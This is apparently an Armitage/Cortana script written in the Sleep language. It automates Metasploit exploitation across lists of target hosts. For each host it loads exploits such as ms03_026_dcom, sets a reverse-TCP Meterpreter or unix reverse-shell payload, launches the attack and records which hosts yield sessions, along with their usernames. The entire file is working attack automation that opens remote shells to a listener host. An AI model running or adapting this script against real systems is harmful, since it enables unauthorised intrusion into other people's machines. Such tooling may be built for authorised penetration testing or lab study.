on ready {
   #fire_event_local("sessionHandle");
}

command arguments {
   local('$counter @attacks');

   $counter = $1;
   #@attacks = split(';', "172.16.221.132,windows/dcerpc/ms03_026_dcom,172.16.221.1;172.16.221.133,windows/dcerpc/ms03_026_dcom,172.16.221.1;");
   @attacks = split(';', "$2");

   fire_event_local("prep_attacks", $counter, @attacks);
}

on prep_attacks {
   local('@attacks @temp $i $j $k $limit $host $tempHost')
   
   $limit = $1;
   @temp = $2;
   $tempHost = "";
   $j = 0;
   $k = 0;

   for ($i = 0; $i < $limit; $i++, $k++) {
      $host = split(',', @temp[$i])[0];
      #println($tempHost . " vs " . $host);
      if ($tempHost eq "") {
         $tempHost = $host;
      }
      else if ($tempHost ne $host) {
         $tempHost = $host;
         $j++;
         $k = 0;
      }      
      
      #println("[" . $j . "][" . "$k" . "]");
      @attacks[$j][$k] = @temp[$i];
      
   }
   #println(@attacks);
   fire_event_local("launch_attacks", @attacks);
   #quit();
}


on launch_attacks {
   local('$attack @attacks $exploit $rhost $lhost $i $os $console $name $payload $sessionCreated $numSessions');

   $console = console();
   @attacks = $1;
   $numSessions = 0;
   $payload = "";

   for ($i = 0; $i < size(@attacks); $i++) {
      $sessionCreated = 0; 
      #println("host: " . @attacks[$i]);  
      foreach $attack (@attacks[$i]) {
         ($rhost, $name, $lhost) = split(',', $attack);
         $os = split('/', $name)[0];
         $exploit = "exploit/" . $name;

         cmd($console, "use $exploit");
         cmd_set($console, %(RHOST => "$rhost", LHOST => "$lhost", TARGET => "0"));

         if ($payload eq "") {
            $payload = determinePayload($os);
         }

         if ($os ne "multi") {
            cmd($console, "set payload " . $payload);
         }

         cmd($console, "exploit -j");
      
         sleep(5000);
         cmd($console, "jobs -K");
         if (size(sessions()) > $numSessions) {
            $sessionCreated = 1;
            $numSessions = size(sessions());
            break;
         }
      }
      if ($sessionCreated == 0) {
      	fire_event_local("noSessions", $rhost);
      }
      $payload = "";
   }
   fire_event_local("sessionHandle");
}

sub determinePayload {
   if ($1 == "windows") {
      return "windows/meterpreter/reverse_tcp";
   }
   return "payload/cmd/unix/reverse";
}

on sessionHandle {
   local('$console %out @ids $flag $sessionNum $host $user %r $exploit $type');
   
   @ids = session_ids();
   %out = sessions();
   $flag = "true";
   $console = console();

   cmd($console, "jobs -K");   

   foreach $sessionNum (@ids) {
   	%r = %out[$sessionNum];
   	$host = %r["host"];
   	$user = %r["username"];
   	$exploit = split('/', %r["via_exploit"], 2)[1];
      $type = %r["type"];

   	println("$host" . "," . "$flag" . "," . "$sessionNum" . "," . "$user" . "," . "$exploit" . "," . "$type");
   }
   quit();
}

on noSessions {
   local('$host');
   $host = $1;

   println("$host" . ",false,0,0,0,0");
}